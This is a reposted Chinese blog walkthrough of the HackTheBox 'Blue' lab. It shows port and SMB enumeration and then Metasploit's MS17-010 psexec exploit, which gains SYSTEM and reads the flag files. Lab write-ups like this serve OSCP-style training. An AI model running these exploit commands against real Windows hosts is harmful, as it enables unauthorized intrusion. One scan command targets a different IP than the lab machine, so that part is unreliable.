渗透测试靶机练习No.122 HTB:Blue(OSCP Prep)
2022-10-12 17:12:11 Author: 渗透安全团队(查看原文) 阅读量:16 收藏


靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Blue

靶场: HackTheBox.com

靶机名称:Blue

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.3
 
 靶机:10.10.10.40

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo masscan -p1-65535 -e tun0  10.10.10.40

 sudo nmap -sC -sV -p 80,88,139,445,389,593,636 10.10.10.175 -oN nmap.log

从扫描结果中看到靶机系统为Windows7 7601,对445端口进行检测

SMB服务渗透

 smbclient -N -L 10.10.10.40

发现共享目录

 smbmap -H 10.10.10.40 -u "0xdf" -p "0xdf"

发现Share与Users两个目录可读,收集敏感信息

 smbclient //10.10.10.40/Share

Share目录为空,再来看看Users目录

smbclient //10.10.10.40/Users

Users共享目录下面有两个文件夹,但未找到敏感信息

nmap扫描脚本漏洞

sudo nmap --script smb-vuln* 10.10.10.40 -p 445 -oN nmap-smb-vuln.log

又是MS17-010,开启msf攻击

msfocnsole
search ms17-010
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.10.10.40
set LHOST 10.10.16.3
run

攻击成功,拿到SYSTEM权限

cd C:\Users
dir
type haris\desktop\user.txt
type administrator\desktop\root.txt

拿到root.txt,游戏结束

星 球 免 费 福 利

 转发公众号本文到朋友圈

 截图到公众号后台第1、3、5名获取免费进入星球

星球的最近主题和星球内部工具一些展示

欢 迎 加 入 星 球 !

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247493547&idx=2&sn=ccac78ffcfdaf8a28d58ff013ef12620&chksm=c1761a04f601931225415403bd97073ed9b2e8b0e1eef56c47f53cd569a37b2315a17f0ce2ec#rd
如有侵权请联系:admin#unsafe.sh